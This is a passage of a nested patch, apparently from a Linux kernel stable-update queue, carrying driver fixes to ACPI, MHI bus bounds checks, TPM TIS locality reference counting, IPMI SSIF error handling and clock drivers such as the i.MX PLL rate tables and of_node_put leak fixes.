+-	 /* ThinkPad W530 */
+-	 .matches = {
+-		DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
+-		DMI_MATCH(DMI_PRODUCT_VERSION, "ThinkPad W530"),
+-		},
+-	},
+-
+ 	/*
+ 	 * These models have a working acpi_video backlight control, and using
+ 	 * native backlight causes a regression where backlight does not work
+diff --git a/drivers/acpi/viot.c b/drivers/acpi/viot.c
+index ed752cbbe6362..c8025921c129b 100644
+--- a/drivers/acpi/viot.c
++++ b/drivers/acpi/viot.c
+@@ -328,6 +328,7 @@ static int viot_pci_dev_iommu_init(struct pci_dev *pdev, u16 dev_id, void *data)
+ {
+ 	u32 epid;
+ 	struct viot_endpoint *ep;
++	struct device *aliased_dev = data;
+ 	u32 domain_nr = pci_domain_nr(pdev->bus);
+ 
+ 	list_for_each_entry(ep, &viot_pci_ranges, list) {
+@@ -338,7 +339,7 @@ static int viot_pci_dev_iommu_init(struct pci_dev *pdev, u16 dev_id, void *data)
+ 			epid = ((domain_nr - ep->segment_start) << 16) +
+ 				dev_id - ep->bdf_start + ep->endpoint_id;
+ 
+-			return viot_dev_iommu_init(&pdev->dev, ep->viommu,
++			return viot_dev_iommu_init(aliased_dev, ep->viommu,
+ 						   epid);
+ 		}
+ 	}
+@@ -372,7 +373,7 @@ int viot_iommu_configure(struct device *dev)
+ {
+ 	if (dev_is_pci(dev))
+ 		return pci_for_each_dma_alias(to_pci_dev(dev),
+-					      viot_pci_dev_iommu_init, NULL);
++					      viot_pci_dev_iommu_init, dev);
+ 	else if (dev_is_platform(dev))
+ 		return viot_mmio_dev_iommu_init(to_platform_device(dev));
+ 	return -ENODEV;
+diff --git a/drivers/base/cacheinfo.c b/drivers/base/cacheinfo.c
+index f05acf3c16c6b..88205a240fb2e 100644
+--- a/drivers/base/cacheinfo.c
++++ b/drivers/base/cacheinfo.c
+@@ -38,11 +38,10 @@ static inline bool cache_leaves_are_shared(struct cacheinfo *this_leaf,
+ {
+ 	/*
+ 	 * For non DT/ACPI systems, assume unique level 1 caches,
+-	 * system-wide shared caches for all other levels. This will be used
+-	 * only if arch specific code has not populated shared_cpu_map
++	 * system-wide shared caches for all other levels.
+ 	 */
+ 	if (!(IS_ENABLED(CONFIG_OF) || IS_ENABLED(CONFIG_ACPI)))
+-		return !(this_leaf->level == 1);
++		return (this_leaf->level != 1) && (sib_leaf->level != 1);
+ 
+ 	if ((sib_leaf->attributes & CACHE_ID) &&
+ 	    (this_leaf->attributes & CACHE_ID))
+diff --git a/drivers/base/cpu.c b/drivers/base/cpu.c
+index 4c98849577d4e..7af8e33735a36 100644
+--- a/drivers/base/cpu.c
++++ b/drivers/base/cpu.c
+@@ -487,7 +487,8 @@ static const struct attribute_group *cpu_root_attr_groups[] = {
+ bool cpu_is_hotpluggable(unsigned int cpu)
+ {
+ 	struct device *dev = get_cpu_device(cpu);
+-	return dev && container_of(dev, struct cpu, dev)->hotpluggable;
++	return dev && container_of(dev, struct cpu, dev)->hotpluggable
++		&& tick_nohz_cpu_hotpluggable(cpu);
+ }
+ EXPORT_SYMBOL_GPL(cpu_is_hotpluggable);
+ 
+diff --git a/drivers/base/platform.c b/drivers/base/platform.c
+index 968f3d71eeab2..a4938d1c8fe1d 100644
+--- a/drivers/base/platform.c
++++ b/drivers/base/platform.c
+@@ -1416,7 +1416,9 @@ static void platform_remove(struct device *_dev)
+ 	struct platform_driver *drv = to_platform_driver(_dev->driver);
+ 	struct platform_device *dev = to_platform_device(_dev);
+ 
+-	if (drv->remove) {
++	if (drv->remove_new) {
++		drv->remove_new(dev);
++	} else if (drv->remove) {
+ 		int ret = drv->remove(dev);
+ 
+ 		if (ret)
+diff --git a/drivers/block/drbd/drbd_receiver.c b/drivers/block/drbd/drbd_receiver.c
+index 757f4692b5bd8..1fc815be12d01 100644
+--- a/drivers/block/drbd/drbd_receiver.c
++++ b/drivers/block/drbd/drbd_receiver.c
+@@ -1283,7 +1283,7 @@ static void one_flush_endio(struct bio *bio)
+ static void submit_one_flush(struct drbd_device *device, struct issue_flush_context *ctx)
+ {
+ 	struct bio *bio = bio_alloc(device->ldev->backing_bdev, 0,
+-				    REQ_OP_FLUSH | REQ_PREFLUSH, GFP_NOIO);
++				    REQ_OP_WRITE | REQ_PREFLUSH, GFP_NOIO);
+ 	struct one_flush_context *octx = kmalloc(sizeof(*octx), GFP_NOIO);
+ 
+ 	if (!octx) {
+diff --git a/drivers/bluetooth/btsdio.c b/drivers/bluetooth/btsdio.c
+index 02893600db390..795be33f2892d 100644
+--- a/drivers/bluetooth/btsdio.c
++++ b/drivers/bluetooth/btsdio.c
+@@ -354,7 +354,6 @@ static void btsdio_remove(struct sdio_func *func)
+ 
+ 	BT_DBG("func %p", func);
+ 
+-	cancel_work_sync(&data->work);
+ 	if (!data)
+ 		return;
+ 
+diff --git a/drivers/bus/mhi/host/boot.c b/drivers/bus/mhi/host/boot.c
+index 1c69feee17030..d2a19b07ccb88 100644
+--- a/drivers/bus/mhi/host/boot.c
++++ b/drivers/bus/mhi/host/boot.c
+@@ -391,6 +391,7 @@ void mhi_fw_load_handler(struct mhi_controller *mhi_cntrl)
+ {
+ 	const struct firmware *firmware = NULL;
+ 	struct device *dev = &mhi_cntrl->mhi_dev->dev;
++	enum mhi_pm_state new_state;
+ 	const char *fw_name;
+ 	void *buf;
+ 	dma_addr_t dma_addr;
+@@ -508,14 +509,18 @@ error_ready_state:
+ 	}
+ 
+ error_fw_load:
+-	mhi_cntrl->pm_state = MHI_PM_FW_DL_ERR;
+-	wake_up_all(&mhi_cntrl->state_event);
++	write_lock_irq(&mhi_cntrl->pm_lock);
++	new_state = mhi_tryset_pm_state(mhi_cntrl, MHI_PM_FW_DL_ERR);
++	write_unlock_irq(&mhi_cntrl->pm_lock);
++	if (new_state == MHI_PM_FW_DL_ERR)
++		wake_up_all(&mhi_cntrl->state_event);
+ }
+ 
+ int mhi_download_amss_image(struct mhi_controller *mhi_cntrl)
+ {
+ 	struct image_info *image_info = mhi_cntrl->fbc_image;
+ 	struct device *dev = &mhi_cntrl->mhi_dev->dev;
++	enum mhi_pm_state new_state;
+ 	int ret;
+ 
+ 	if (!image_info)
+@@ -526,8 +531,11 @@ int mhi_download_amss_image(struct mhi_controller *mhi_cntrl)
+ 			       &image_info->mhi_buf[image_info->entries - 1]);
+ 	if (ret) {
+ 		dev_err(dev, "MHI did not load AMSS, ret:%d\n", ret);
+-		mhi_cntrl->pm_state = MHI_PM_FW_DL_ERR;
+-		wake_up_all(&mhi_cntrl->state_event);
++		write_lock_irq(&mhi_cntrl->pm_lock);
++		new_state = mhi_tryset_pm_state(mhi_cntrl, MHI_PM_FW_DL_ERR);
++		write_unlock_irq(&mhi_cntrl->pm_lock);
++		if (new_state == MHI_PM_FW_DL_ERR)
++			wake_up_all(&mhi_cntrl->state_event);
+ 	}
+ 
+ 	return ret;
+diff --git a/drivers/bus/mhi/host/init.c b/drivers/bus/mhi/host/init.c
+index bf672de351315..04fbccff65ac2 100644
+--- a/drivers/bus/mhi/host/init.c
++++ b/drivers/bus/mhi/host/init.c
+@@ -516,6 +516,12 @@ int mhi_init_mmio(struct mhi_controller *mhi_cntrl)
+ 		return -EIO;
+ 	}
+ 
++	if (val >= mhi_cntrl->reg_len - (8 * MHI_DEV_WAKE_DB)) {
++		dev_err(dev, "CHDB offset: 0x%x is out of range: 0x%zx\n",
++			val, mhi_cntrl->reg_len - (8 * MHI_DEV_WAKE_DB));
++		return -ERANGE;
++	}
++
+ 	/* Setup wake db */
+ 	mhi_cntrl->wake_db = base + val + (8 * MHI_DEV_WAKE_DB);
+ 	mhi_cntrl->wake_set = false;
+@@ -532,6 +538,12 @@ int mhi_init_mmio(struct mhi_controller *mhi_cntrl)
+ 		return -EIO;
+ 	}
+ 
++	if (val >= mhi_cntrl->reg_len - (8 * mhi_cntrl->total_ev_rings)) {
++		dev_err(dev, "ERDB offset: 0x%x is out of range: 0x%zx\n",
++			val, mhi_cntrl->reg_len - (8 * mhi_cntrl->total_ev_rings));
++		return -ERANGE;
++	}
++
+ 	/* Setup event db address for each ev_ring */
+ 	mhi_event = mhi_cntrl->mhi_event;
+ 	for (i = 0; i < mhi_cntrl->total_ev_rings; i++, val += 8, mhi_event++) {
+diff --git a/drivers/bus/mhi/host/main.c b/drivers/bus/mhi/host/main.c
+index df0fbfee7b78b..0c3a009ed9bb0 100644
+--- a/drivers/bus/mhi/host/main.c
++++ b/drivers/bus/mhi/host/main.c
+@@ -503,7 +503,7 @@ irqreturn_t mhi_intvec_threaded_handler(int irq_number, void *priv)
+ 	}
+ 	write_unlock_irq(&mhi_cntrl->pm_lock);
+ 
+-	if (pm_state != MHI_PM_SYS_ERR_DETECT || ee == mhi_cntrl->ee)
++	if (pm_state != MHI_PM_SYS_ERR_DETECT)
+ 		goto exit_intvec;
+ 
+ 	switch (ee) {
+diff --git a/drivers/bus/mhi/host/pci_generic.c b/drivers/bus/mhi/host/pci_generic.c
+index f39657f71483c..cb5c067e78be1 100644
+--- a/drivers/bus/mhi/host/pci_generic.c
++++ b/drivers/bus/mhi/host/pci_generic.c
+@@ -344,8 +344,6 @@ static const struct mhi_channel_config mhi_foxconn_sdx55_channels[] = {
+ 	MHI_CHANNEL_CONFIG_DL(13, "MBIM", 32, 0),
+ 	MHI_CHANNEL_CONFIG_UL(32, "DUN", 32, 0),
+ 	MHI_CHANNEL_CONFIG_DL(33, "DUN", 32, 0),
+-	MHI_CHANNEL_CONFIG_UL(92, "DUN2", 32, 1),
+-	MHI_CHANNEL_CONFIG_DL(93, "DUN2", 32, 1),
+ 	MHI_CHANNEL_CONFIG_HW_UL(100, "IP_HW0_MBIM", 128, 2),
+ 	MHI_CHANNEL_CONFIG_HW_DL(101, "IP_HW0_MBIM", 128, 3),
+ };
+diff --git a/drivers/char/ipmi/Kconfig b/drivers/char/ipmi/Kconfig
+index b6c0d35fc1a5f..f4adc6feb3b22 100644
+--- a/drivers/char/ipmi/Kconfig
++++ b/drivers/char/ipmi/Kconfig
+@@ -162,7 +162,8 @@ config IPMI_KCS_BMC_SERIO
+ 
+ config ASPEED_BT_IPMI_BMC
+ 	depends on ARCH_ASPEED || COMPILE_TEST
+-	depends on REGMAP && REGMAP_MMIO && MFD_SYSCON
++	depends on MFD_SYSCON
++	select REGMAP_MMIO
+ 	tristate "BT IPMI bmc driver"
+ 	help
+ 	  Provides a driver for the BT (Block Transfer) IPMI interface
+diff --git a/drivers/char/ipmi/ipmi_ssif.c b/drivers/char/ipmi/ipmi_ssif.c
+index f49d2c2ef3cfd..273ad74d0b4cf 100644
+--- a/drivers/char/ipmi/ipmi_ssif.c
++++ b/drivers/char/ipmi/ipmi_ssif.c
+@@ -564,8 +564,10 @@ static void retry_timeout(struct timer_list *t)
+ 
+ 	if (waiting)
+ 		start_get(ssif_info);
+-	if (resend)
++	if (resend) {
+ 		start_resend(ssif_info);
++		ssif_inc_stat(ssif_info, send_retries);
++	}
+ }
+ 
+ static void watch_timeout(struct timer_list *t)
+@@ -792,9 +794,9 @@ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 		} else if (data[0] != (IPMI_NETFN_APP_REQUEST | 1) << 2
+ 			   || data[1] != IPMI_GET_MSG_FLAGS_CMD) {
+ 			/*
+-			 * Don't abort here, maybe it was a queued
+-			 * response to a previous command.
++			 * Recv error response, give up.
+ 			 */
++			ssif_info->ssif_state = SSIF_IDLE;
+ 			ipmi_ssif_unlock_cond(ssif_info, flags);
+ 			dev_warn(&ssif_info->client->dev,
+ 				 "Invalid response getting flags: %x %x\n",
+diff --git a/drivers/char/tpm/tpm-chip.c b/drivers/char/tpm/tpm-chip.c
+index c467eeae99733..bd6ebc66a55a9 100644
+--- a/drivers/char/tpm/tpm-chip.c
++++ b/drivers/char/tpm/tpm-chip.c
+@@ -683,7 +683,8 @@ EXPORT_SYMBOL_GPL(tpm_chip_register);
+ void tpm_chip_unregister(struct tpm_chip *chip)
+ {
+ 	tpm_del_legacy_sysfs(chip);
+-	if (IS_ENABLED(CONFIG_HW_RANDOM_TPM) && !tpm_is_firmware_upgrade(chip))
++	if (IS_ENABLED(CONFIG_HW_RANDOM_TPM) && !tpm_is_firmware_upgrade(chip) &&
++	    !tpm_amd_is_rng_defective(chip))
+ 		hwrng_unregister(&chip->hwrng);
+ 	tpm_bios_log_teardown(chip);
+ 	if (chip->flags & TPM_CHIP_FLAG_TPM2 && !tpm_is_firmware_upgrade(chip))
+diff --git a/drivers/char/tpm/tpm_tis_core.c b/drivers/char/tpm/tpm_tis_core.c
+index 3f98e587b3e84..eecfbd7e97867 100644
+--- a/drivers/char/tpm/tpm_tis_core.c
++++ b/drivers/char/tpm/tpm_tis_core.c
+@@ -136,16 +136,27 @@ static bool check_locality(struct tpm_chip *chip, int l)
+ 	return false;
+ }
+ 
+-static int release_locality(struct tpm_chip *chip, int l)
++static int __tpm_tis_relinquish_locality(struct tpm_tis_data *priv, int l)
++{
++	tpm_tis_write8(priv, TPM_ACCESS(l), TPM_ACCESS_ACTIVE_LOCALITY);
++
++	return 0;
++}
++
++static int tpm_tis_relinquish_locality(struct tpm_chip *chip, int l)
+ {
+ 	struct tpm_tis_data *priv = dev_get_drvdata(&chip->dev);
+ 
+-	tpm_tis_write8(priv, TPM_ACCESS(l), TPM_ACCESS_ACTIVE_LOCALITY);
++	mutex_lock(&priv->locality_count_mutex);
++	priv->locality_count--;
++	if (priv->locality_count == 0)
++		__tpm_tis_relinquish_locality(priv, l);
++	mutex_unlock(&priv->locality_count_mutex);
+ 
+ 	return 0;
+ }
+ 
+-static int request_locality(struct tpm_chip *chip, int l)
++static int __tpm_tis_request_locality(struct tpm_chip *chip, int l)
+ {
+ 	struct tpm_tis_data *priv = dev_get_drvdata(&chip->dev);
+ 	unsigned long stop, timeout;
+@@ -186,6 +197,20 @@ again:
+ 	return -1;
+ }
+ 
++static int tpm_tis_request_locality(struct tpm_chip *chip, int l)
++{
++	struct tpm_tis_data *priv = dev_get_drvdata(&chip->dev);
++	int ret = 0;
++
++	mutex_lock(&priv->locality_count_mutex);
++	if (priv->locality_count == 0)
++		ret = __tpm_tis_request_locality(chip, l);
++	if (!ret)
++		priv->locality_count++;
++	mutex_unlock(&priv->locality_count_mutex);
++	return ret;
++}
++
+ static u8 tpm_tis_status(struct tpm_chip *chip)
+ {
+ 	struct tpm_tis_data *priv = dev_get_drvdata(&chip->dev);
+@@ -652,7 +677,7 @@ static int probe_itpm(struct tpm_chip *chip)
+ 	if (vendor != TPM_VID_INTEL)
+ 		return 0;
+ 
+-	if (request_locality(chip, 0) != 0)
++	if (tpm_tis_request_locality(chip, 0) != 0)
+ 		return -EBUSY;
+ 
+ 	rc = tpm_tis_send_data(chip, cmd_getticks, len);
+@@ -673,7 +698,7 @@ static int probe_itpm(struct tpm_chip *chip)
+ 
+ out:
+ 	tpm_tis_ready(chip);
+-	release_locality(chip, priv->locality);
++	tpm_tis_relinquish_locality(chip, priv->locality);
+ 
+ 	return rc;
+ }
+@@ -732,25 +757,17 @@ static irqreturn_t tis_int_handler(int dummy, void *dev_id)
+ 	return IRQ_HANDLED;
+ }
+ 
+-static int tpm_tis_gen_interrupt(struct tpm_chip *chip)
++static void tpm_tis_gen_interrupt(struct tpm_chip *chip)
+ {
+ 	const char *desc = "attempting to generate an interrupt";
+ 	u32 cap2;
+ 	cap_t cap;
+ 	int ret;
+ 
+-	ret = request_locality(chip, 0);
+-	if (ret < 0)
+-		return ret;
+-
+ 	if (chip->flags & TPM_CHIP_FLAG_TPM2)
+ 		ret = tpm2_get_tpm_pt(chip, 0x100, &cap2, desc);
+ 	else
+ 		ret = tpm1_getcap(chip, TPM_CAP_PROP_TIS_TIMEOUT, &cap, desc, 0);
+-
+-	release_locality(chip, 0);
+-
+-	return ret;
+ }
+ 
+ /* Register the IRQ and issue a command that will cause an interrupt. If an
+@@ -773,52 +790,55 @@ static int tpm_tis_probe_irq_single(struct tpm_chip *chip, u32 intmask,
+ 	}
+ 	priv->irq = irq;
+ 
++	rc = tpm_tis_request_locality(chip, 0);
++	if (rc < 0)
++		return rc;
++
+ 	rc = tpm_tis_read8(priv, TPM_INT_VECTOR(priv->locality),
+ 			   &original_int_vec);
+-	if (rc < 0)
++	if (rc < 0) {
++		tpm_tis_relinquish_locality(chip, priv->locality);
+ 		return rc;
++	}
+ 
+ 	rc = tpm_tis_write8(priv, TPM_INT_VECTOR(priv->locality), irq);
+ 	if (rc < 0)
+-		return rc;
++		goto restore_irqs;
+ 
+ 	rc = tpm_tis_read32(priv, TPM_INT_STATUS(priv->locality), &int_status);
+ 	if (rc < 0)
+-		return rc;
++		goto restore_irqs;
+ 
+ 	/* Clear all existing */
+ 	rc = tpm_tis_write32(priv, TPM_INT_STATUS(priv->locality), int_status);
+ 	if (rc < 0)
+-		return rc;
+-
++		goto restore_irqs;
+ 	/* Turn on */
+ 	rc = tpm_tis_write32(priv, TPM_INT_ENABLE(priv->locality),
+ 			     intmask | TPM_GLOBAL_INT_ENABLE);
+ 	if (rc < 0)
+-		return rc;
++		goto restore_irqs;
+ 
+ 	priv->irq_tested = false;
+ 
+ 	/* Generate an interrupt by having the core call through to
+ 	 * tpm_tis_send
+ 	 */
+-	rc = tpm_tis_gen_interrupt(chip);
+-	if (rc < 0)
+-		return rc;
++	tpm_tis_gen_interrupt(chip);
+ 
++restore_irqs:
+ 	/* tpm_tis_send will either confirm the interrupt is working or it
+ 	 * will call disable_irq which undoes all of the above.
+ 	 */
+ 	if (!(chip->flags & TPM_CHIP_FLAG_IRQ)) {
+-		rc = tpm_tis_write8(priv, original_int_vec,
+-				TPM_INT_VECTOR(priv->locality));
+-		if (rc < 0)
+-			return rc;
+-
+-		return 1;
++		tpm_tis_write8(priv, original_int_vec,
++			       TPM_INT_VECTOR(priv->locality));
++		rc = -1;
+ 	}
+ 
+-	return 0;
++	tpm_tis_relinquish_locality(chip, priv->locality);
++
++	return rc;
+ }
+ 
+ /* Try to find the IRQ the TPM is using. This is for legacy x86 systems that
+@@ -932,8 +952,8 @@ static const struct tpm_class_ops tpm_tis = {
+ 	.req_complete_mask = TPM_STS_DATA_AVAIL | TPM_STS_VALID,
+ 	.req_complete_val = TPM_STS_DATA_AVAIL | TPM_STS_VALID,
+ 	.req_canceled = tpm_tis_req_canceled,
+-	.request_locality = request_locality,
+-	.relinquish_locality = release_locality,
++	.request_locality = tpm_tis_request_locality,
++	.relinquish_locality = tpm_tis_relinquish_locality,
+ 	.clk_enable = tpm_tis_clkrun_enable,
+ };
+ 
+@@ -967,6 +987,8 @@ int tpm_tis_core_init(struct device *dev, struct tpm_tis_data *priv, int irq,
+ 	priv->timeout_min = TPM_TIMEOUT_USECS_MIN;
+ 	priv->timeout_max = TPM_TIMEOUT_USECS_MAX;
+ 	priv->phy_ops = phy_ops;
++	priv->locality_count = 0;
++	mutex_init(&priv->locality_count_mutex);
+ 
+ 	dev_set_drvdata(&chip->dev, priv);
+ 
+@@ -1013,14 +1035,14 @@ int tpm_tis_core_init(struct device *dev, struct tpm_tis_data *priv, int irq,
+ 		   TPM_INTF_DATA_AVAIL_INT | TPM_INTF_STS_VALID_INT;
+ 	intmask &= ~TPM_GLOBAL_INT_ENABLE;
+ 
+-	rc = request_locality(chip, 0);
++	rc = tpm_tis_request_locality(chip, 0);
+ 	if (rc < 0) {
+ 		rc = -ENODEV;
+ 		goto out_err;
+ 	}
+ 
+ 	tpm_tis_write32(priv, TPM_INT_ENABLE(priv->locality), intmask);
+-	release_locality(chip, 0);
++	tpm_tis_relinquish_locality(chip, 0);
+ 
+ 	rc = tpm_chip_start(chip);
+ 	if (rc)
+@@ -1080,13 +1102,13 @@ int tpm_tis_core_init(struct device *dev, struct tpm_tis_data *priv, int irq,
+ 		 * proper timeouts for the driver.
+ 		 */
+ 
+-		rc = request_locality(chip, 0);
++		rc = tpm_tis_request_locality(chip, 0);
+ 		if (rc < 0)
+ 			goto out_err;
+ 
+ 		rc = tpm_get_timeouts(chip);
+ 
+-		release_locality(chip, 0);
++		tpm_tis_relinquish_locality(chip, 0);
+ 
+ 		if (rc) {
+ 			dev_err(dev, "Could not get TPM timeouts and durations\n");
+@@ -1094,17 +1116,21 @@ int tpm_tis_core_init(struct device *dev, struct tpm_tis_data *priv, int irq,
+ 			goto out_err;
+ 		}
+ 
+-		if (irq) {
++		if (irq)
+ 			tpm_tis_probe_irq_single(chip, intmask, IRQF_SHARED,
+ 						 irq);
+-			if (!(chip->flags & TPM_CHIP_FLAG_IRQ)) {
+-				dev_err(&chip->dev, FW_BUG
++		else
++			tpm_tis_probe_irq(chip, intmask);
++
++		if (!(chip->flags & TPM_CHIP_FLAG_IRQ)) {
++			dev_err(&chip->dev, FW_BUG
+ 					"TPM interrupt not working, polling instead\n");
+ 
+-				disable_interrupts(chip);
+-			}
+-		} else {
+-			tpm_tis_probe_irq(chip, intmask);
++			rc = tpm_tis_request_locality(chip, 0);
++			if (rc < 0)
++				goto out_err;
++			disable_interrupts(chip);
++			tpm_tis_relinquish_locality(chip, 0);
+ 		}
+ 	}
+ 
+@@ -1165,28 +1191,27 @@ int tpm_tis_resume(struct device *dev)
+ 	struct tpm_chip *chip = dev_get_drvdata(dev);
+ 	int ret;
+ 
++	ret = tpm_tis_request_locality(chip, 0);
++	if (ret < 0)
++		return ret;
++
+ 	if (chip->flags & TPM_CHIP_FLAG_IRQ)
+ 		tpm_tis_reenable_interrupts(chip);
+ 
+ 	ret = tpm_pm_resume(dev);
+ 	if (ret)
+-		return ret;
++		goto out;
+ 
+ 	/*
+ 	 * TPM 1.2 requires self-test on resume. This function actually returns
+ 	 * an error code but for unknown reason it isn't handled.
+ 	 */
+-	if (!(chip->flags & TPM_CHIP_FLAG_TPM2)) {
+-		ret = request_locality(chip, 0);
+-		if (ret < 0)
+-			return ret;
+-
++	if (!(chip->flags & TPM_CHIP_FLAG_TPM2))
+ 		tpm1_do_selftest(chip);
++out:
++	tpm_tis_relinquish_locality(chip, 0);
+ 
+-		release_locality(chip, 0);
+-	}
+-
+-	return 0;
++	return ret;
+ }
+ EXPORT_SYMBOL_GPL(tpm_tis_resume);
+ #endif
+diff --git a/drivers/char/tpm/tpm_tis_core.h b/drivers/char/tpm/tpm_tis_core.h
+index b68479e0de10f..1d51d5168fb6e 100644
+--- a/drivers/char/tpm/tpm_tis_core.h
++++ b/drivers/char/tpm/tpm_tis_core.h
+@@ -91,6 +91,8 @@ enum tpm_tis_flags {
+ 
+ struct tpm_tis_data {
+ 	u16 manufacturer_id;
++	struct mutex locality_count_mutex;
++	unsigned int locality_count;
+ 	int locality;
+ 	int irq;
+ 	bool irq_tested;
+diff --git a/drivers/clk/at91/clk-sam9x60-pll.c b/drivers/clk/at91/clk-sam9x60-pll.c
+index d757003004cbb..0882ed01d5c27 100644
+--- a/drivers/clk/at91/clk-sam9x60-pll.c
++++ b/drivers/clk/at91/clk-sam9x60-pll.c
+@@ -668,7 +668,7 @@ sam9x60_clk_register_frac_pll(struct regmap *regmap, spinlock_t *lock,
+ 
+ 		ret = sam9x60_frac_pll_compute_mul_frac(&frac->core, FCORE_MIN,
+ 							parent_rate, true);
+-		if (ret <= 0) {
++		if (ret < 0) {
+ 			hw = ERR_PTR(ret);
+ 			goto free;
+ 		}
+diff --git a/drivers/clk/clk-conf.c b/drivers/clk/clk-conf.c
+index 2ef819606c417..1a4e6340f95ce 100644
+--- a/drivers/clk/clk-conf.c
++++ b/drivers/clk/clk-conf.c
+@@ -33,9 +33,12 @@ static int __set_clk_parents(struct device_node *node, bool clk_supplier)
+ 			else
+ 				return rc;
+ 		}
+-		if (clkspec.np == node && !clk_supplier)
++		if (clkspec.np == node && !clk_supplier) {
++			of_node_put(clkspec.np);
+ 			return 0;
++		}
+ 		pclk = of_clk_get_from_provider(&clkspec);
++		of_node_put(clkspec.np);
+ 		if (IS_ERR(pclk)) {
+ 			if (PTR_ERR(pclk) != -EPROBE_DEFER)
+ 				pr_warn("clk: couldn't get parent clock %d for %pOF\n",
+@@ -48,10 +51,12 @@ static int __set_clk_parents(struct device_node *node, bool clk_supplier)
+ 		if (rc < 0)
+ 			goto err;
+ 		if (clkspec.np == node && !clk_supplier) {
++			of_node_put(clkspec.np);
+ 			rc = 0;
+ 			goto err;
+ 		}
+ 		clk = of_clk_get_from_provider(&clkspec);
++		of_node_put(clkspec.np);
+ 		if (IS_ERR(clk)) {
+ 			if (PTR_ERR(clk) != -EPROBE_DEFER)
+ 				pr_warn("clk: couldn't get assigned clock %d for %pOF\n",
+@@ -93,10 +98,13 @@ static int __set_clk_rates(struct device_node *node, bool clk_supplier)
+ 				else
+ 					return rc;
+ 			}
+-			if (clkspec.np == node && !clk_supplier)
++			if (clkspec.np == node && !clk_supplier) {
++				of_node_put(clkspec.np);
+ 				return 0;
++			}
+ 
+ 			clk = of_clk_get_from_provider(&clkspec);
++			of_node_put(clkspec.np);
+ 			if (IS_ERR(clk)) {
+ 				if (PTR_ERR(clk) != -EPROBE_DEFER)
+ 					pr_warn("clk: couldn't get clock %d for %pOF\n",
+diff --git a/drivers/clk/imx/clk-fracn-gppll.c b/drivers/clk/imx/clk-fracn-gppll.c
+index a2aaa14fc1aef..f6674110a88e0 100644
+--- a/drivers/clk/imx/clk-fracn-gppll.c
++++ b/drivers/clk/imx/clk-fracn-gppll.c
+@@ -15,6 +15,7 @@
+ #include "clk.h"
+ 
+ #define PLL_CTRL		0x0
++#define HW_CTRL_SEL		BIT(16)
+ #define CLKMUX_BYPASS		BIT(2)
+ #define CLKMUX_EN		BIT(1)
+ #define POWERUP_MASK		BIT(0)
+@@ -60,18 +61,20 @@ struct clk_fracn_gppll {
+ };
+ 
+ /*
+- * Fvco = Fref * (MFI + MFN / MFD)
+- * Fout = Fvco / (rdiv * odiv)
++ * Fvco = (Fref / rdiv) * (MFI + MFN / MFD)
++ * Fout = Fvco / odiv
++ * The (Fref / rdiv) should be in range 20MHz to 40MHz
++ * The Fvco should be in range 2.5Ghz to 5Ghz
+  */
+ static const struct imx_fracn_gppll_rate_table fracn_tbl[] = {
+-	PLL_FRACN_GP(650000000U, 81, 0, 1, 0, 3),
++	PLL_FRACN_GP(650000000U, 162, 50, 100, 0, 6),
+ 	PLL_FRACN_GP(594000000U, 198, 0, 1, 0, 8),
+-	PLL_FRACN_GP(560000000U, 70, 0, 1, 0, 3),
+-	PLL_FRACN_GP(498000000U, 83, 0, 1, 0, 4),
++	PLL_FRACN_GP(560000000U, 140, 0, 1, 0, 6),
++	PLL_FRACN_GP(498000000U, 166, 0, 1, 0, 8),
+ 	PLL_FRACN_GP(484000000U, 121, 0, 1, 0, 6),
+ 	PLL_FRACN_GP(445333333U, 167, 0, 1, 0, 9),
+-	PLL_FRACN_GP(400000000U, 50, 0, 1, 0, 3),
+-	PLL_FRACN_GP(393216000U, 81, 92, 100, 0, 5)
++	PLL_FRACN_GP(400000000U, 200, 0, 1, 0, 12),
++	PLL_FRACN_GP(393216000U, 163, 84, 100, 0, 10)
+ };
+ 
+ struct imx_fracn_gppll_clk imx_fracn_gppll = {
+@@ -191,6 +194,11 @@ static int clk_fracn_gppll_set_rate(struct clk_hw *hw, unsigned long drate,
+ 
+ 	rate = imx_get_pll_settings(pll, drate);
+ 
++	/* Hardware control select disable. PLL is control by register */
++	tmp = readl_relaxed(pll->base + PLL_CTRL);
++	tmp &= ~HW_CTRL_SEL;
++	writel_relaxed(tmp, pll->base + PLL_CTRL);
++
+ 	/* Disable output */
+ 	tmp = readl_relaxed(pll->base + PLL_CTRL);
+ 	tmp &= ~CLKMUX_EN;
+diff --git a/drivers/clk/imx/clk-imx8ulp.c b/drivers/clk/imx/clk-imx8ulp.c
+index 8eb1af2d64298..ca0e4a3aa454e 100644
+--- a/drivers/clk/imx/clk-imx8ulp.c
++++ b/drivers/clk/imx/clk-imx8ulp.c
+@@ -200,8 +200,8 @@ static int imx8ulp_clk_cgc1_init(struct platform_device *pdev)
+ 	clks[IMX8ULP_CLK_NIC_AD_DIVPLAT] = imx_clk_hw_divider_flags("nic_ad_divplat", "nic_sel", base + 0x34, 21, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
+ 	clks[IMX8ULP_CLK_NIC_PER_DIVPLAT] = imx_clk_hw_divider_flags("nic_per_divplat", "nic_ad_divplat", base + 0x34, 14, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
+ 	clks[IMX8ULP_CLK_XBAR_AD_DIVPLAT] = imx_clk_hw_divider_flags("xbar_ad_divplat", "nic_ad_divplat", base + 0x38, 14, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
+-	clks[IMX8ULP_CLK_XBAR_DIVBUS] = imx_clk_hw_divider_flags("xbar_divbus", "nic_ad_divplat", base + 0x38, 7, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
+-	clks[IMX8ULP_CLK_XBAR_AD_SLOW] = imx_clk_hw_divider_flags("xbar_ad_slow", "nic_ad_divplat", base + 0x38, 0, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
++	clks[IMX8ULP_CLK_XBAR_DIVBUS] = imx_clk_hw_divider_flags("xbar_divbus", "xbar_ad_divplat", base + 0x38, 7, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
++	clks[IMX8ULP_CLK_XBAR_AD_SLOW] = imx_clk_hw_divider_flags("xbar_ad_slow", "xbar_divbus", base + 0x38, 0, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
+ 
+ 	clks[IMX8ULP_CLK_SOSC_DIV1_GATE] = imx_clk_hw_gate_dis("sosc_div1_gate", "sosc", base + 0x108, 7);
